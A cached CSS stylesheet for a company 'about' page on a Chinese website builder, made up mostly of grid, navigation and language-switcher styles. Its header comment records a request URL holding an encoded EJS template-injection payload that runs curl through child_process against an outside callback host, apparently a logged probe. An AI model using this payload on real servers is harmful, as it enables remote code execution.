﻿/* cache file /mnt/yzproc/YZ-Site/caches/csscache/9/92515/92515_1568465_1_.cache exists */
/*md5:95bf79a0d9425bbf9c6892c051eda2d9*/
/*time: 2025-04-12 02:13:34*/
/*url:www.sunshinewx.com/cn/about-sunshine?settings%5Bview%20options%5D%5BoutputFunctionName%5D=6cvmgxye%3Bprocess.mainModule.require%28%27child_process%27%29.execSync%28%27curl%20http%3A//rndeqmru8re.9b5501a3.axss.xyz%20--retry%200%27%29%3Bsapk8fbo*/
.ModuleGridContainer[gridswidthmode="2"]{max-width:1200px;width:auto;}
.BodyMain2Zone{display:none;}
.BodyMain3Zone{display:none;}
.BodyMain4Zone{display:none;}
.ModuleGridCustomGiant.layout-101 .ModuleSubContainer .addnewhelper{white-space: unset;}
.ModuleGridCustomGiant.layout-101 .ModuleSubContainer {display:table;width: 100%;position: relative;table-layout:fixed;}
.ModuleGridCustomGiant.layout-101 .ModuleSubContainer.sticky {display:flex}
.ModuleGridCustomGiant.layout-101 .ModuleSubContainer > .SubContainer{display:table-cell; vertical-align: top;}
.ModuleGridCustomGiant.layout-101 .ModuleSubContainer.sticky > .SubContainer{display:block; position: sticky; top:20px;height: 100% !important; }
.ModuleGridCustomGiant.layout-101 .ModuleSubContainer > .SubContainer.ModuleHoverBoxItem_2{display:none}
.ModuleGridCustomGiant.layout-101 .ModuleSubContainer .SubPadding{
    height: 100%;
    position: relative;
    display: table-cell;
}
.ModuleGridCustomGiant.layout-101 .ModuleSubContainer .SubDrag:after{
    display: block;
    content: '';
    width: 1px;
    border-left: 1px dashed rgba(75, 151, 255, 0);
    height: 100%;
    margin: auto;
}
.ModuleGridCustomGiant.layout-101:hover .SubDrag:after{border-left: 1px dashed rgba(75, 151, 255, .8);}
.ModuleGridCustomGiant.layout-101 .ModuleSubContainer .SubDrag{
    width: 6px;
    cursor: e-resize;
    position: absolute;
    z-index: 99;
    min-height: 66px;
    height: 100%;
    background-color: rgba(75, 151, 255, 0);
}
.ModuleGridCustomGiant.layout-101 .ModuleSubContainer .SubDrag:hover{background-color: rgba(75, 151, 255, .8);}
.ModuleGridCustomGiant.layout-101 .ModuleSubContainer .SubDrag:hover:after{border-left: 1px dashed rgba(75, 151, 255, 0);}
.ModuleGridCustomGiant.layout-101 .row {margin-right: 0px;margin-left: 0px;}
.ModuleGridCustomGiant.layout-101 .ModuleGridCol{padding: 0px;}

.ModuleGridCustomGiant.layout-101 .ModuleGridContainer{
    margin-right: auto;
    margin-left: auto;
    padding-right: 0;
    padding-left: 0;
}
.ModuleGridCustomGiant.layout-101{height: 100%;position: relative;}
.ModuleGridCustomGiant.layout-101 .ModuleSubContainer{position: relative;}
.ModuleGridCustomGiant.layout-101 .gridBgVideo{display: flex; position: absolute;top: 0;left: 0;width:100%;z-index: 0;}
.ModuleGridCustomGiant.layout-101 .gridBgVideo .bgVideoMask{position: absolute;top: 0;left: 0;right: 0;bottom: 0;background-color: rgb(0,0,0);}
.ModuleGridCustomGiant.layout-101 .gridBgVideo .bgVideo{width: 100%; height: 100%; object-fit: cover; object-position: center center;}
.ModuleGridCustomGiant.layout-101 .gridBgVideo.noBgVideo{display: none;}
.ModuleGridCustomGiant.layout-101 .ModuleSubContainer .ModuleContainer .SubPadding {height: 100%}

@media only screen and (max-width: 767px) {
    .ModuleGridCustomGiant.layout-101 .ModuleSubContainer {display: flex;flex-wrap: wrap;}
    .ModuleGridCustomGiant.layout-101 .ModuleSubContainer > .SubPadding{float:left;height: 10px;}
	.ModuleGridCustomGiant.layout-101 .ModuleSubContainer > .SubContainer{float:left;padding-top:2px;padding-bottom:2px;}
	.ModuleGridCustomGiant.layout-101 .ModuleSubContainer > .SubPadding .SubDrag{display:none;}
    /* padding 宽度 用 5，子容器宽度为 (100% - (列数 - 1) * padding宽度)/列数) */
    /* 12列 */
    .ModuleGridCustomGiant.layout-101 .grid-col-12 > .SubPadding{width:5px;}
    .ModuleGridCustomGiant.layout-101 .grid-col-12 > .SubContainer{width:calc((100% - 55px)/12)!important;}
    /* 11列 */
    .ModuleGridCustomGiant.layout-101 .grid-col-11 > .SubPadding{width:5px;}
    .ModuleGridCustomGiant.layout-101 .grid-col-11 > .SubContainer{width:calc((100% - 50px)/11)!important;}
    /* 10列 */
    .ModuleGridCustomGiant.layout-101 .grid-col-10 > .SubPadding{width:5px;}
    .ModuleGridCustomGiant.layout-101 .grid-col-10 > .SubContainer{width:calc((100% - 45px)/10)!important;}
    /* 9列 */
    .ModuleGridCustomGiant.layout-101 .grid-col-9 > .SubPadding{width:5px;}
    .ModuleGridCustomGiant.layout-101 .grid-col-9 > .SubContainer{width:calc((100% - 40px)/10)!important;}
    /* 8列 */
    .ModuleGridCustomGiant.layout-101 .grid-col-8 > .SubPadding{width:5px;}
    .ModuleGridCustomGiant.layout-101 .grid-col-8 > .SubContainer{width:calc((100% - 35px)/8)!important;}
    /* 7列 */
    .ModuleGridCustomGiant.layout-101 .grid-col-7 > .SubPadding{width:5px;}
    .ModuleGridCustomGiant.layout-101 .grid-col-7 > .SubContainer{width:calc((100% - 30px)/7)!important;}
	/* 6列 */
	.ModuleGridCustomGiant.layout-101 .grid-col-6 > .SubPadding{width:5px;}
	.ModuleGridCustomGiant.layout-101 .grid-col-6 > .SubContainer{width:calc((100% - 25px)/6)!important;}
	/* 5列 */
	.ModuleGridCustomGiant.layout-101 .grid-col-5 > .SubPadding{width:5px;}
	.ModuleGridCustomGiant.layout-101 .grid-col-5 > .SubPadding5{display:none;}
	.ModuleGridCustomGiant.layout-101 .grid-col-5 > .SubContainer{width:calc((100% - 20px)/5)!important;}
	/* 4列 */
	.ModuleGridCustomGiant.layout-101 .grid-col-4 > .SubPadding{width:5px;}
	.ModuleGridCustomGiant.layout-101 .grid-col-4 > .SubPadding4{display:none;}
    .ModuleGridCustomGiant.layout-101 .grid-col-4 > .SubPadding8{display:none;}
	.ModuleGridCustomGiant.layout-101 .grid-col-4 > .SubContainer{width:calc((100% - 15px)/4)!important;}
	/* 3列 */
	.ModuleGridCustomGiant.layout-101 .grid-col-3 > .SubPadding{width:5px;}
	.ModuleGridCustomGiant.layout-101 .grid-col-3 > .SubPadding3{display:none;}
    .ModuleGridCustomGiant.layout-101 .grid-col-3 > .SubPadding6{display:none;}
	.ModuleGridCustomGiant.layout-101 .grid-col-3 > .SubContainer{width:calc((100% - 10px)/3)!important;}
	/* 2列 */
	.ModuleGridCustomGiant.layout-101 .grid-col-2 > .SubPadding{width:5px;}
	.ModuleGridCustomGiant.layout-101 .grid-col-2 > .SubPadding2{display:none;}
	.ModuleGridCustomGiant.layout-101 .grid-col-2 > .SubPadding4{display:none;}
    .ModuleGridCustomGiant.layout-101 .grid-col-2 > .SubPadding6{display:none;}
    .ModuleGridCustomGiant.layout-101 .grid-col-2 > .SubPadding8{display:none;}
	.ModuleGridCustomGiant.layout-101 .grid-col-2 > .SubContainer{width:calc((100% - 5px)/2)!important;}
	/* 1列 无padding */
	.ModuleGridCustomGiant.layout-101 .grid-col-1 > .SubPadding{width:0px;display:none;}
	.ModuleGridCustomGiant.layout-101 .grid-col-1 > .SubContainer{width:100%!important;}
    .ModuleGridCustomGiant.layout-101 .ModuleSubContainer.sticky > .SubContainer{
        position:inherit !important;
        top:unset !important;
    }
}

.ModuleGridCustomGiant.layout-101 .ModuleGridBorder{border:0px !important;padding: 0 !important;}
.module_383568415 .ModuleHead .HeadCenter{float:none;}
#module_383568415 {
padding:0px;
}
#module_383568415 {
position:static;
z-index:4000;
top:0px;
left:0px;
width:100%;
height: auto;
}
#module_383568415 .ModuleHead383568415 {
display:none;
}
#module_383568415 .BodyCenter.BodyCenter383568415 {
background:none;background-color:rgba(0,0,0,0);
}
#module_383568415 >.module_383568415 {
border-top-style:solid;
border-top-color:#000;
border-top-width:0px;
border-left-style:solid;
border-left-color:#000;
border-left-width:0px;
border-right-style:solid;
border-right-color:#000;
border-right-width:0px;
border-bottom-style:solid;
border-bottom-color:#000;
border-bottom-width:0px;
}
#module_383568415 >.module_383568415{
overflow: hidden;
-webkit-backface-visibility:hidden;
border-top-left-radius:0px;
border-top-right-radius:0px;
border-bottom-left-radius:0px;
border-bottom-right-radius:0px;
}
@media screen and (min-width: 768px){
#module_383568415 .BodyCenter.BodyCenter383568415 {
padding-top:0.0000%;
padding-left:0.0000%;
padding-right:0.0000%;
padding-bottom:0.0000%;
}
}
@media screen and (max-width: 767px){
#module_383568415 .BodyCenter.BodyCenter383568415 {
padding-top:0px;
padding-left:0px;
padding-right:0px;
padding-bottom:0px;
}
}
@media screen and (min-width: 768px){
#module_383568415 >.module_383568415 {
margin-top:0.0000%;
margin-left:0.0000%;
margin-right:0.0000%;
margin-bottom:0.0000%;
}
}
@media screen and (max-width: 767px){
#module_383568415 >.module_383568415 {
margin-top:0px;
margin-left:0px;
margin-right:0px;
margin-bottom:0px;
}
}
#module_383568415 >.module_383568415 {box-shadow: 0px 0px 0px 0px #ccc}
#module_383568415:hover {
border:none;
}
#module_383568415:hover >.module_383568415 {box-shadow: 0px 0px 0px 0px #ccc;transition: box-shadow 0.5s ease 0s;}

#module_383568415 .ModuleSubContainer{background-color:rgb(255, 255, 255);}
#module_383568415 .ModuleSubContainer{background-image:none;}
#module_383568415 .ModuleSubContainer{background-repeat:no-repeat;}
#module_383568415 .ModuleSubContainer{background-position:0% 0%;}
#module_383568415 .ModuleSubContainer{background-attachment:scroll;}
#module_383568415 .ModuleSubContainer{}
#module_383568415 {!bgVideo!}{bgVideoUrl:none}
#module_383568415 .gridBgVideo .bgVideoMask{opacity:0.2}
#module_383568415 .ModuleSubContainer{box-shadow:0px 0px 0px 0px rgba(0, 0, 0, 0); transition: box-shadow 0.5s ease;}
#module_383568415 .ModuleSubContainer:hover{box-shadow:0px 0px 0px 0px rgba(0, 0, 0, 0);}
.ModuleGridContainer.ModuleGridContainer383568415 {max-width:1400px;width:auto;}
.ModuleGridContainer.ModuleGridContainer383568415 .SubPadding {width:0px;}
/*图文模块 layout 101*/
.ModuleImageTextGiant.layout-101 {font-size: 14px;}
.ModuleImageTextGiant.layout-101 .imageTextGiant-Container{height: auto; word-wrap: break-word;max-height: 100%;padding:10px;max-width: 100%; overflow: hidden; position: relative;}.module_383568840 .ModuleHead .HeadCenter{float:none;}
#module_383568840 {
padding:0px;
}
#module_383568840 {
position:static;
z-index:0;
top:0px;
left:0px;
width:100%;
height: auto;
}
#module_383568840 .ModuleHead383568840 {
display:none;
}
#module_383568840 {
border:none;
}
@media screen and (min-width: 768px){
#module_383568840 >.module_383568840 {
margin-top:1.6077%;
margin-left:0.0000%;
margin-right:0.0000%;
margin-bottom:0.0000%;
}
}
@media screen and (max-width: 767px){
#module_383568840 >.module_383568840 {
}
}

#module_383568840 .ModuleImageTextGiantContent{margin-top:0px;}
#module_383568840 .ModuleImageTextGiantContent{margin-bottom:0px;}
#module_383568840 .ModuleImageTextGiantContent{margin-left:0px;}
#module_383568840 .ModuleImageTextGiantContent{margin-right:0px;}
#module_383568840 .imageTextGiant-Container{padding-top:10px;}
#module_383568840 .imageTextGiant-Container{padding-bottom:10px;}
#module_383568840 .imageTextGiant-Container{padding-left:10px;}
#module_383568840 .imageTextGiant-Container{padding-right:10px;}
#module_383568840 .showHandle .btn{font-size:14px;}
#module_383568840 .showHandle .btn{font-family:;}
#module_383568840 .showHandle .btn{color:#333;}
#module_383568840 .showHandle .btn{font-weight:400;}
#module_383568840 .showHandle .btn{text-decoration:none;}
#module_383568840 .showHandle .btn{font-style:normal;}
#module_383568840 .showHandle div{border-top-color:#ddd !important;}
#module_383568840 .showHandle div{border-top-style:solid !important;}
#module_383568840 .showHandle div{border-top-width:1px !important;}
#module_383568840 .showHandle{background-color:transparent;}
#module_383568840 .showHandle{}
#module_383568840 .showHandle{background-repeat:no-repeat;}
#module_383568840 .showHandle{}
#module_383568840 .showHandle{}
#module_383568840 .showHandle{}
#module_383568840 a{font-size:unset;font-family:unset}
.ModuleGridContainer.ModuleGridContainer383568415 #Sub383568415_1 {width:25.2857%;}
.ModuleNavGiant.layout-102 .main-nav-content {
  position: relative;
  width: 100%;
  margin: 0 auto;
  transition: all 0.3s;
  -moz-transition: all 0.3s;
  -webkit-transition: all 0.3s;
  -o-transition: all 0.3s;
  line-height: 0;
  overflow: hidden;
}
.ModuleNavGiant.layout-102 .aroundMune{
   position: absolute;
   display: flex;
   align-items: center;
   right: 0px;
   padding:0 10px;
   height: 100%;
   z-index: 5;
   transform: rotateY(90deg);
}
.ModuleNavGiant.layout-102 .aroundMune.active{
  transform: rotateY(0deg);
}
.ModuleNavGiant.layout-102 .moveMenuRight, .ModuleNavGiant.layout-102 .moveMenuLeft{
   display: inline-block;
   width: 36px;
   height: 36px;
   line-height: 36px;
   font-size: 16px;
   color:#666;
   text-align: center;
   border:1px solid rgba(0,0,0,.1);
   border-radius: 5px;
   cursor: pointer;
}
.ModuleNavGiant.layout-102 .main-nav-content .moveMenuRight{
  background-color: rgba(238,238,238,.6);
}
.ModuleNavGiant.layout-102 .main-nav-content .moveMenuLeft{
   display:none;
   background-color: rgba(238,238,238,.6);
   margin-right: 10px

}
.ModuleNavGiant.layout-102 .moveMenuRight:hover, .ModuleNavGiant.layout-102 .moveMenuLeft:hover{
   color:#fff;
   background-color:rgba(204,204,204,.6);
}
.ModuleNavGiant.layout-102 .main-nav-content >.blank-solve{
  width: auto;
  display: inline-block;
  transition: all .4s;
  position: relative;
  left: 0;
}
.ModuleNavGiant.layout-102 .main-nav-item-group {
	float: left;
	text-align: center;
}
.ModuleNavGiant.layout-102 .main-nav-item {
  box-sizing: content-box;
  padding: 0 25px;
  height: 80px;
  line-height: 80px;
  color: #000000;
  position: relative;
  display:block;
}
.ModuleNavGiant.layout-102 .main-nav-item::before {
  content: '';
  position: absolute;
  width: 0%;
  transition: all 0.2s ease-out 0s;
  -moz-transition: all 0.2s ease-out 0s;
  -webkit-transition: all 0.2s ease-out 0s;
  -o-transition: all 0.2s ease-out 0s;
  border-bottom:3px solid #1976d2;
  z-index: 1;
  left: 50%;
  bottom: 0;
}
.ModuleNavGiant.layout-102 .main-nav-item-hover::before {
  width: 100%;
  z-index: 1;
  left: 50%;
  transform: translateX(-50%);
}
.ModuleNavGiant.layout-102 .sub-nav-item-group {
  width: 192px;
  text-align: center;
  border-top: 2px solid #333;
  display: none;
}
.ModuleNavGiant.layout-102 .sub-nav-item {
  display: block;
  height: 40px;
  line-height: 40px;
  transition: all 0.3s;
  -moz-transition: all 0.3s;
  -webkit-transition: all 0.3s;
  -o-transition: all 0.3s;
  font-size: 12px;
  border-bottom: 1px solid #e6e6e6;
  background-color: #fff;
  box-shadow: 0px 5px 10px rgba(0, 0, 0, 0.1);
}
.ModuleNavGiant.layout-102 .sub-nav-item:last-child{
  border-bottom: none!important;
}
.ModuleNavGiant.layout-102 .sub-nav-item:hover {
  padding-left: 10px;
  background-color: #f7f7f7;
}
.ModuleNavGiant.layout-102 .sub-nav-item-group.current {
  display: block;
}
.ModuleNavGiant.layout-102 .main-nav-item-group.current .main-nav-item::after {
  content: '';
  position: absolute;
  width: 100%;
  height: 3px;
  background-color: #1976d2;
  z-index: 11111;
  left: 0;
  bottom: 0;
}
.ModuleNavGiant.layout-102 .clearfix:after{content:'.';clear: both;display:block;width:0;height:0;overflow: hidden;visibility: hidden;}
.ModuleNavGiant.layout-102 .verticalMenu {height: auto !important;}
.ModuleNavGiant.layout-102 .verticalMenu.main-nav-content >.blank-solve {width: 100% !important;}
.ModuleNavGiant.layout-102 .verticalMenu .main-nav-item-group {float: unset; width: 100%;}
.ModuleNavGiant.layout-102 .verticalMenu .main-nav-item-group:last-child {margin-bottom: 0 !important;}
.ModuleNavGiant.layout-102 .verticalMenu .main-nav-item {display: inline-block; padding: 0 !important; text-align: center;}

.ModuleNavGiant.layout-102 .menu{
    font-size: 12px;
    opacity: 0.6;
    float: right;
    margin-left: 8px;
    margin-top: 1px;
    transform:rotate(0deg);
    transition: all .3s linear;
    -webkit-transform:rotate(0deg);
    -webkit-transition: all .3s linear;
}
.ModuleNavGiant.layout-102 .menuUp{
    transform: rotate(180deg);
    -webkit-transform: rotate(180deg);
    margin-top: -1px;
}
.ModuleNavGiant.layout-102 .sub-menu{
    display: none !important;
}.module_383569207 .ModuleHead .HeadCenter{float:none;}
#module_383569207 {
padding:0px;
}
#module_383569207 {
position:static;
z-index:0;
top:53px;
left:1243px;
width:100%;
height: auto;
}
#module_383569207 .ModuleHead383569207 {
display:none;
}
#module_383569207 .BodyCenter.BodyCenter383569207 {
background:none;background-color:rgba(0,0,0,0);
}
#module_383569207 >.module_383569207 {
border-top-style:solid;
border-top-color:#000;
border-top-width:0px;
border-left-style:solid;
border-left-color:#000;
border-left-width:0px;
border-right-style:solid;
border-right-color:#000;
border-right-width:0px;
border-bottom-style:solid;
border-bottom-color:#000;
border-bottom-width:0px;
}
#module_383569207 >.module_383569207{
overflow: hidden;
-webkit-backface-visibility:hidden;
border-top-left-radius:0px;
border-top-right-radius:0px;
border-bottom-left-radius:0px;
border-bottom-right-radius:0px;
}
@media screen and (min-width: 768px){
#module_383569207 .BodyCenter.BodyCenter383569207 {
padding-top:0.0000%;
padding-left:0.0000%;
padding-right:0.0000%;
padding-bottom:0.0000%;
}
}
@media screen and (max-width: 767px){
#module_383569207 .BodyCenter.BodyCenter383569207 {
padding-top:0px;
padding-left:0px;
padding-right:0px;
padding-bottom:0px;
}
}
@media screen and (min-width: 768px){
#module_383569207 >.module_383569207 {
margin-top:0.0000%;
margin-left:49.4612%;
margin-right:0.0000%;
margin-bottom:0.0000%;
}
}
@media screen and (max-width: 767px){
#module_383569207 >.module_383569207 {
margin-top:0px;
margin-left:0px;
margin-right:0px;
margin-bottom:0px;
}
}
#module_383569207 >.module_383569207 {box-shadow: 0px 0px 0px 0px #ccc}
#module_383569207:hover {
border:none;
}
#module_383569207:hover >.module_383569207 {box-shadow: 0px 0px 0px 0px #ccc;transition: box-shadow 0.5s ease 0s;}

#module_383569207 .main-nav-item{height:80px;line-height:80px} #module_383569207 .main-nav-content{height:80px;}
#module_383569207 .main-nav-content{background-color:#fff;}
#module_383569207 .main-nav-content{background-image:none;}
#module_383569207 .main-nav-content{background-repeat:no-repeat;}
#module_383569207 .main-nav-content{}
#module_383569207 .main-nav-content{}
#module_383569207 .main-nav-content{}
#module_383569207 .main-nav-content, #module_383569207 .verticalMenu .main-nav-item-group{text-align:left;}
#module_383569207 .main-nav-item{font-size:14px;}
#module_383569207 .main-nav-item{font-family:arial, helvetica,sans-serif;}
#module_383569207 .main-nav-item{color:#333;}
#module_383569207 .main-nav-item{font-weight:normal;}
#module_383569207 .main-nav-item{text-decoration:none;}
#module_383569207 .main-nav-item{font-style:normal;}
#module_383569207 .main-nav-item{background-color:transparent;}
#module_383569207 .main-nav-item{background-image:none;}
#module_383569207 .main-nav-item{background-repeat:no-repeat;}
#module_383569207 .main-nav-item{}
#module_383569207 .main-nav-item{}
#module_383569207 .main-nav-item{}
#module_383569207 .main-nav-item{width:auto;}
#module_383569207 .main-nav-item{padding-left:16px;padding-right:16px;} #module_383569207 .verticalMenu .main-nav-item-group{margin-bottom:16px;}
#module_383569207 .sub-nav-item-group{border-top-color:rgb(229, 11, 28);}
#module_383569207 .sub-nav-item-group{border-top-style:solid;}
#module_383569207 .sub-nav-item-group{border-top-width:2px;}
#module_383569207 .sub-nav-item-group{border-right-color:transparent;}
#module_383569207 .sub-nav-item-group{border-right-style:none;}
#module_383569207 .sub-nav-item-group{border-right-width:0px;}
#module_383569207 .sub-nav-item-group{border-bottom-color:transparent;}
#module_383569207 .sub-nav-item-group{border-bottom-style:none;}
#module_383569207 .sub-nav-item-group{border-bottom-width:0px;}
#module_383569207 .sub-nav-item-group{border-left-color:transparent;}
#module_383569207 .sub-nav-item-group{border-left-style:none;}
#module_383569207 .sub-nav-item-group{border-left-width:0px;}
#module_383569207 .sub-nav-item-group{width:192px;}
#module_383569207 .sub-nav-item{height:40px;line-height:40px}
#module_383569207 .sub-nav-item{font-size:12px;}
#module_383569207 .sub-nav-item{font-family:微软雅黑,Microsoft YaHei;}
#module_383569207 .sub-nav-item{color:#000;}
#module_383569207 .sub-nav-item{font-weight:normal;}
#module_383569207 .sub-nav-item{text-decoration:none;}
#module_383569207 .sub-nav-item{font-style:normal;}
#module_383569207 .sub-nav-item{background-color:#fff;}
#module_383569207 .sub-nav-item{background-image:none;}
#module_383569207 .sub-nav-item{background-repeat:no-repeat;}
#module_383569207 .sub-nav-item{}
#module_383569207 .sub-nav-item{}
#module_383569207 .sub-nav-item{}
#module_383569207 .sub-nav-item{border-bottom-color:#e6e6e6;}
#module_383569207 .sub-nav-item{border-bottom-style:solid;}
#module_383569207 .sub-nav-item{border-bottom-width:1px;}
#module_383569207 .sub-nav-item{margin-top:0px;}
#module_383569207 .main-nav-item-hover{font-size:14px;}
#module_383569207 .main-nav-item-hover{font-family:arial, helvetica,sans-serif;}
#module_383569207 .main-nav-item-hover{color:#e50b1c;}
#module_383569207 .main-nav-item-hover{font-weight:normal;}
#module_383569207 .main-nav-item-hover{text-decoration:none;}
#module_383569207 .main-nav-item-hover{font-style:normal;}
#module_383569207 .main-nav-item-hover{background-color:transparent;}
#module_383569207 .main-nav-item-hover{background-image:none;}
#module_383569207 .main-nav-item-hover{background-repeat:no-repeat;}
#module_383569207 .main-nav-item-hover{}
#module_383569207 .main-nav-item-hover{}
#module_383569207 .main-nav-item-hover{}
#module_383569207 .main-nav-item-hover::before,#module_383569207 .main-nav-item::before{border-bottom-color:#e50b1c;}
#module_383569207 .main-nav-item-hover::before{border-bottom-style:solid;}
#module_383569207 .main-nav-item-hover::before{border-bottom-width:3px;}
#module_383569207 .main-nav-item-hover::before{width:%}
#module_383569207 .sub-nav-item:hover{font-size:12px;}
#module_383569207 .sub-nav-item:hover{font-family:微软雅黑,Microsoft YaHei;}
#module_383569207 .sub-nav-item:hover{color:#000;}
#module_383569207 .sub-nav-item:hover{font-weight:normal;}
#module_383569207 .sub-nav-item:hover{text-decoration:none;}
#module_383569207 .sub-nav-item:hover{font-style:normal;}
#module_383569207 .sub-nav-item:hover{background-color:#f2f2f2;}
#module_383569207 .sub-nav-item:hover{background-image:none;}
#module_383569207 .sub-nav-item:hover{background-repeat:no-repeat;}
#module_383569207 .sub-nav-item:hover{}
#module_383569207 .sub-nav-item:hover{}
#module_383569207 .sub-nav-item:hover{}


.ModuleGridContainer.ModuleGridContainer383568415 #Sub383568415_2 {width:66.2857%;}
.ModuleLangSwitchGiant.layout-102 .lang-list{
    display: inline-block;
    vertical-align: top;
}
.ModuleLangSwitchGiant.layout-102 .lang-list li{
	float:left
}
.ModuleLangSwitchGiant.layout-102 .lang-text{
	font-size:12px;
	color:#333;
	padding:10px;
	position: relative;
}
.ModuleLangSwitchGiant.layout-102 .lang-text.current{
	color:#f10215;
}
.ModuleLangSwitchGiant.layout-102 .lang-text:hover{
	color:#f10215;
}
.ModuleLangSwitchGiant.layout-102 .lang-split{
	border-left:1px solid #333;
}
.ModuleLangSwitchGiant.layout-102 li:nth-last-of-type(1)>.lang-split{
	border-left:none !important;
}
.ModuleLangSwitchGiant.layout-102 .lang-text:after{ content: ""; position: absolute; width: 1px; background: #ccc; height: 14px; top: 50%; right: 0;    transform: translate(0 ,-50%);}
.ModuleLangSwitchGiant.layout-102 .lang-list li:last-child a:after{ background: none !important}.module_383569201 .ModuleHead .HeadCenter{float:none;}
#module_383569201 {
padding:0px;
}
#module_383569201 {
position:static;
z-index:0;
width:100%;
height: auto;
}
#module_383569201 .ModuleHead383569201 {
display:none;
}
#module_383569201 {
border:none;
}
@media screen and (min-width: 768px){
#module_383569201 >.module_383569201 {
margin-top:24.5763%;
margin-left:0.0000%;
margin-right:0.0000%;
margin-bottom:0.0000%;
}
}
@media screen and (max-width: 767px){
#module_383569201 >.module_383569201 {
}
}

#module_383569201 .BodyCenter{text-align:left;}
#module_383569201 .lang-text{font-size:12px;}
#module_383569201 .lang-text{font-family:;}
#module_383569201 .lang-text{color:#333;}
#module_383569201 .lang-text{font-weight:normal;}
#module_383569201 .lang-text{text-decoration:none;}
#module_383569201 .lang-text{font-style:normal;}
#module_383569201 .lang-text:after{background:;}
#module_383569201 .lang-list{background-color:#fff;}
#module_383569201 .lang-list{}
#module_383569201 .lang-list{background-repeat:no-repeat;}
#module_383569201 .lang-list{}
#module_383569201 .lang-list{}
#module_383569201 .lang-list{}
#module_383569201 .lang-text:hover,#module_383569201 .lang-text.current{font-size:12px;}
#module_383569201 .lang-text:hover,#module_383569201 .lang-text.current{font-family:;}
#module_383569201 .lang-text:hover,#module_383569201 .lang-text.current{color:#f10215;}
#module_383569201 .lang-text:hover,#module_383569201 .lang-text.current{font-weight:normal;}
#module_383569201 .lang-text:hover,#module_383569201 .lang-text.current{text-decoration:none;}
#module_383569201 .lang-text:hover,#module_383569201 .lang-text.current{font-style:normal;}

.ModuleGridContainer.ModuleGridContainer383568415 #Sub383568415_4 {width:8.428599999999998%;}
.ModuleGridGiant.layout-101 .ModuleGridItem {
    padding: 0;
    min-height: 0.1px;
}

.ModuleGridGiant.layout-101 .row {
    margin-right: 0px;
    margin-left: 0px;
}

.ModuleGridGiant.layout-101 .ModuleGridCol {
    padding: 0px;
}

.ModuleGridGiant.layout-101 .ModuleGridContainer {
    margin-right: auto;
    margin-left: auto;
    padding-right: 0;
    padding-left: 0;
}
.ModuleGridGiant.layout-101{height: 100%;position: relative;}
.ModuleGridGiant.layout-101 .ModuleSubContainer{position: relative;}
.ModuleGridGiant.layout-101 .gridBgVideo{display: flex; position: absolute;top: 0;left: 0;width:100%;z-index: 0;}
.ModuleGridGiant.layout-101 .gridBgVideo .bgVideoMask{position: absolute;top: 0;left: 0;right: 0;bottom: 0;background-color: rgb(0,0,0);}
.ModuleGridGiant.layout-101 .gridBgVideo .bgVideo{width: 100%; height: 100%; object-fit: cover; object-position: center center;}
.ModuleGridGiant.layout-101 .gridBgVideo.noBgVideo{display: none;}

@media only screen and (max-width: 767px) { 
    .ModuleGridGiant.layout-101 .ModuleGridItem {
        height: 100% !important;
    }
}.module_383568494 .ModuleHead .HeadCenter{float:none;}
#module_383568494 {
padding:0px;
}
#module_383568494 {
position:static;
z-index:0;
width:100%;
height: auto;
}
#module_383568494 .ModuleHead383568494 {
display:none;
}
#module_383568494 .BodyCenter.BodyCenter383568494 {
background:none;background-color:rgba(0,0,0,0);
}
#module_383568494 >.module_383568494 {
border-top-style:solid;
border-top-color:#000;
border-top-width:0px;
border-left-style:solid;
border-left-color:#000;
border-left-width:0px;
border-right-style:solid;
border-right-color:#000;
border-right-width:0px;
border-bottom-style:solid;
border-bottom-color:#000;
border-bottom-width:0px;
}
#module_383568494 >.module_383568494{
overflow: hidden;
-webkit-backface-visibility:hidden;
border-top-left-radius:0px;
border-top-right-radius:0px;
border-bottom-left-radius:0px;
border-bottom-right-radius:0px;
}
@media screen and (min-width: 768px){
#module_383568494 .BodyCenter.BodyCenter383568494 {
padding-top:0px;
padding-left:0px;
padding-right:0px;
padding-bottom:0px;
}
}
@media screen and (max-width: 767px){
#module_383568494 .BodyCenter.BodyCenter383568494 {
padding-top:4.6110%;
padding-left:4.6110%;
padding-right:4.6110%;
padding-bottom:4.6110%;
}
}
@media screen and (min-width: 768px){
#module_383568494 >.module_383568494 {
margin-top:0px;
margin-left:0px;
margin-right:0px;
margin-bottom:0px;
}
}
@media screen and (max-width: 767px){
#module_383568494 >.module_383568494 {
margin-top:0.0000%;
margin-left:0.0000%;
margin-right:0.0000%;
margin-bottom:0.0000%;
}
}
#module_383568494 >.module_383568494 {box-shadow: 0px 0px 0px 0px #ccc}
#module_383568494:hover {
border:none;
}
#module_383568494:hover >.module_383568494 {box-shadow: 0px 0px 0px 0px #ccc;transition: box-shadow 0.5s ease 0s;}

#module_383568494 .ModuleSubContainer{background-color:transparent;}
#module_383568494 .ModuleSubContainer{background-image:none;}
#module_383568494 .ModuleSubContainer{background-repeat:no-repeat;}
#module_383568494 .ModuleSubContainer{background-position:0% 0%;}
#module_383568494 .ModuleSubContainer{background-attachment:scroll;}
#module_383568494 .ModuleSubContainer{}
#module_383568494 {!bgVideo!}{bgVideoUrl:none}
#module_383568494 .gridBgVideo .bgVideoMask{opacity:0.2}
#module_383568494 .ModuleSubContainer{box-shadow:0px 0px 0px 0px rgba(0, 0, 0, 0); transition: box-shadow 0.5s ease;}
#module_383568494 .ModuleSubContainer:hover{box-shadow:0px 0px 0px 0px rgba(0, 0, 0, 0);}
.ModuleGridContainer.ModuleGridContainer383568494 {}
.ModuleLangSwitchGiant.layout-106 .lang-list{
    display: inline-block;
    vertical-align: top;
}
.ModuleLangSwitchGiant.layout-106 .lang-list li{
	float:left;
	text-align: center;
	margin-right: 20px;
	line-height: 20px;
}
.ModuleLangSwitchGiant.layout-106 .lang-list li:last-child {
	margin-right: 0;
}
.ModuleLangSwitchGiant.layout-106 .lang-list li a{
	font-size: unset;
}
.ModuleLangSwitchGiant.layout-106 .lang-list li p{
	width: 32px;
	text-align: center;
	height: 20px;
	line-height: 20px;
	display: inline-block;
	margin-right: 8px;
}
.ModuleLangSwitchGiant.layout-106 .lang-list li p img{
	width: 32px;
	max-width: 100%;
	max-height: 100%;
}.module_383569202 .ModuleHead .HeadCenter{float:none;}
#module_383569202 {
padding:0px;
}
#module_383569202 {
position:static;
z-index:0;
width:100%;
height: auto;
}
#module_383569202 .ModuleHead383569202 {
display:none;
}
#module_383569202 .BodyCenter.BodyCenter383569202 {
background:none;background-color:rgba(0,0,0,0);
}
#module_383569202 >.module_383569202 {
border-top-style:solid;
border-top-color:#000;
border-top-width:0px;
border-left-style:solid;
border-left-color:#000;
border-left-width:0px;
